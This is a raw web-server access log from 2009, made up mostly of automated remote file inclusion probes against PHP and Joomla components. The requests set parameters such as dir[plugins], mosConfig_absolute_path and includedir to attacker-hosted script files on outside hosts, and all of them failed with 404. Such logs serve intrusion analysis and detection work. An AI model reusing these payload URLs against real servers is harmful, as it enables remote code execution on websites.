212.98.171.91 - - [26/Oct/2009:05:07:03 -0700] "GET /logs//plugins/safehtml/safehtml.php?dir[plugins]=http://124.0.81.2/new/bbs/skin/uks_gallery_v3010/htmlarea/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:07:08 -0700] "GET /logs/access_090413.log%20%20//plugins/safehtml/safehtml.php?dir[plugins]=http://124.0.81.2/new/bbs/skin/uks_gallery_v3010/htmlarea/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:07:08 -0700] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://124.0.81.2/new/bbs/skin/uks_gallery_v3010/htmlarea/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:07:13 -0700] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://www.npnet.co.kr/bbs/data/news_01/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:07:13 -0700] "GET /logs//plugins/safehtml/safehtml.php?dir[plugins]=http://www.npnet.co.kr/bbs/data/news_01/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:07:13 -0700] "GET /logs/access_090413.log%20%20//plugins/safehtml/safehtml.php?dir[plugins]=http://www.npnet.co.kr/bbs/data/news_01/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:07:15 -0700] "GET /logs/access_090413.log%20%20//plugins/safehtml/safehtml.php?dir[plugins]=http://124.0.81.2/new/bbs/skin/uks_gallery_v3010/htmlarea/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:07:15 -0700] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://124.0.81.2/new/bbs/skin/uks_gallery_v3010/htmlarea/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:07:15 -0700] "GET /logs//plugins/safehtml/safehtml.php?dir[plugins]=http://124.0.81.2/new/bbs/skin/uks_gallery_v3010/htmlarea/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:07:21 -0700] "GET /logs//plugins/safehtml/safehtml.php?dir[plugins]=http://www.npnet.co.kr/bbs/data/news_01/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:07:21 -0700] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://www.npnet.co.kr/bbs/data/news_01/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:07:21 -0700] "GET /logs/access_090413.log%20%20//plugins/safehtml/safehtml.php?dir[plugins]=http://www.npnet.co.kr/bbs/data/news_01/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:07:57 -0700] "GET /logs/access_090413.log//plugins/safehtml/safehtml.php?dir[plugins]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:08:03 -0700] "GET /logs/access_090413.log//plugins/safehtml/safehtml.php?dir[plugins]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:08:43 -0700] "GET /logs/access_090413.log//plugins/safehtml/safehtml.php?dir[plugins]=http://www.npnet.co.kr/bbs/data/news_01/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
110.45.146.152 - - [26/Oct/2009:05:08:57 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
110.45.146.152 - - [26/Oct/2009:05:08:57 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
110.45.146.152 - - [26/Oct/2009:05:08:57 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
212.98.171.91 - - [26/Oct/2009:05:09:04 -0700] "GET /logs/access_090413.log//plugins/safehtml/safehtml.php?dir[plugins]=http://forum.siamchill.com/avatars/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:09:04 -0700] "GET /logs//plugins/safehtml/safehtml.php?dir[plugins]=http://forum.siamchill.com/avatars/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:09:04 -0700] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://forum.siamchill.com/avatars/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:09:15 -0700] "GET /logs/access_090413.log//plugins/safehtml/safehtml.php?dir[plugins]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:09:15 -0700] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:09:16 -0700] "GET /logs/access_090413.log//plugins/safehtml/safehtml.php?dir[plugins]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:09:16 -0700] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:09:16 -0700] "GET /logs//plugins/safehtml/safehtml.php?dir[plugins]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:09:24 -0700] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://forum.siamchill.com/avatars/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:09:24 -0700] "GET /logs/access_090413.log//plugins/safehtml/safehtml.php?dir[plugins]=http://forum.siamchill.com/avatars/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:09:24 -0700] "GET /logs//plugins/safehtml/safehtml.php?dir[plugins]=http://forum.siamchill.com/avatars/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:09:25 -0700] "GET /Stats/components/com_zoom/classes/fs_unix.php?=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
212.98.171.91 - - [26/Oct/2009:05:09:25 -0700] "GET /logs//Stats/components/com_zoom/classes/fs_unix.php?=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
212.98.171.91 - - [26/Oct/2009:05:09:25 -0700] "GET /logs/access.log%20%20//Stats/components/com_zoom/classes/fs_unix.php?=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
212.98.171.91 - - [26/Oct/2009:05:09:35 -0700] "GET /logs//Stats/components/com_zoom/classes/fs_unix.php?=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
212.98.171.91 - - [26/Oct/2009:05:09:35 -0700] "GET /Stats/components/com_zoom/classes/fs_unix.php?=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
212.98.171.91 - - [26/Oct/2009:05:09:35 -0700] "GET /logs/access.log%20%20//Stats/components/com_zoom/classes/fs_unix.php?=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
174.143.3.188 - - [26/Oct/2009:05:09:56 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:05:09:56 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:05:09:56 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:05:09:56 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:10:27 -0700] "GET /logs/access_090413.log//plugins/safehtml/safehtml.php?dir[plugins]=http://124.0.81.2/new/bbs/skin/uks_gallery_v3010/htmlarea/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:10:35 -0700] "GET /logs/access_090413.log//plugins/safehtml/safehtml.php?dir[plugins]=http://www.npnet.co.kr/bbs/data/news_01/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [26/Oct/2009:05:10:38 -0700] "GET /logs/access_090413.log//plugins/safehtml/safehtml.php?dir[plugins]=http://124.0.81.2/new/bbs/skin/uks_gallery_v3010/htmlarea/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.80.193.29 - - [26/Oct/2009:05:11:44 -0700] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=50&ct=result HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; HbTools 4.8.4; IEMB3)" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:41 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:41 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:41 -0700] "GET /logs/access_090330.log%20%20/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:41 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:41 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:41 -0700] "GET /logs/access_090330.log%20%20/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:42 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:42 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:42 -0700] "GET /logs/access_090330.log%20%20/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:42 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:42 -0700] "GET /logs/access_090330.log%20%20/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:42 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:45 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:45 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:45 -0700] "GET /logs/access_090330.log%20%20/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:46 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:46 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:46 -0700] "GET /logs/access_090330.log%20%20/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:53 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:53 -0700] "GET /logs/access_090330.log%20%20/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:53 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:55 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:55 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:55 -0700] "GET /logs/access_090330.log%20%20/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:56 -0700] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:56 -0700] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:57 -0700] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:59 -0700] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:12:59 -0700] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:13:00 -0700] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:13:04 -0700] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:13:07 -0700] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:13:56 -0700] "GET /logs/access_090330.log/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:14:00 -0700] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.131.59 - - [26/Oct/2009:05:14:03 -0700] "GET /logs/access_091012.log/index.php?body=http://www.pmibangalorechapter.org/pmpc2009/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:14:05 -0700] "GET /logs/access_090330.log/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:14:05 -0700] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:14:15 -0700] "GET /logs/access_090330.log/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:14:16 -0700] "GET /logs/access_090330.log/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:14:23 -0700] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:14:24 -0700] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:14:26 -0700] "GET /logs/access_090330.log/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:14:28 -0700] "GET /logs/access_090330.log/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:14:31 -0700] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:14:31 -0700] "GET /logs/access_090330.log/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:14:32 -0700] "GET /logs/access_090330.log/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:14:33 -0700] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:14:34 -0700] "GET /webcalendar//tools/send_reminders.php?noSet=0&includedir=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:14:34 -0700] "GET /logs/access_090316.log//webcalendar//tools/send_reminders.php?noSet=0&includedir=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:14:39 -0700] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [26/Oct/2009:05:14:43 -0700] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://arlianza.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.221.148.147 - - [26/Oct/2009:05:16:03 -0700] "GET /logs/access_091012.log/index.php?body=http://www.pmibangalorechapter.org/pmpc2009/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
208.80.193.26 - - [26/Oct/2009:05:16:39 -0700] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=69&ct=result HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {CFA5A3AF-A440-6404-5F2F-F9D28C900C8E}; .NET CLR 1.1.4322)" "www.galf.org"
208.80.193.39 - - [26/Oct/2009:05:17:03 -0700] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=23&ct=result HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Comcast; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.galf.org"
208.80.193.38 - - [26/Oct/2009:05:17:50 -0700] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=47&ct=result HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {9D7947A3-AD85-B9F2-7600-A8F6305171EF})" "www.galf.org"
202.122.19.24 - - [26/Oct/2009:05:19:17 -0700] "GET /logs//happycast_category_bluishgreen/rosebanditz/index.php?=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [26/Oct/2009:05:19:17 -0700] "GET /happycast_category_bluishgreen/rosebanditz/index.php?=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [26/Oct/2009:05:19:17 -0700] "GET /logs/access_090720.log//happycast_category_bluishgreen/rosebanditz/index.php?=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [26/Oct/2009:05:19:43 -0700] "GET /logs//happycast_category_bluishgreen/rosebanditz/index.php?=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [26/Oct/2009:05:19:43 -0700] "GET /happycast_category_bluishgreen/rosebanditz/index.php?=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [26/Oct/2009:05:19:43 -0700] "GET /logs/access_090720.log//happycast_category_bluishgreen/rosebanditz/index.php?=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:05:19:55 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:05:19:55 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:05:19:55 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:05:19:55 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
208.80.193.42 - - [26/Oct/2009:05:20:40 -0700] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=45&ct=result HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; InfoPath.2)" "www.galf.org"
65.55.106.235 - - [26/Oct/2009:05:23:20 -0700] "GET /cendoc/?D=A HTTP/1.1" 200 526 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
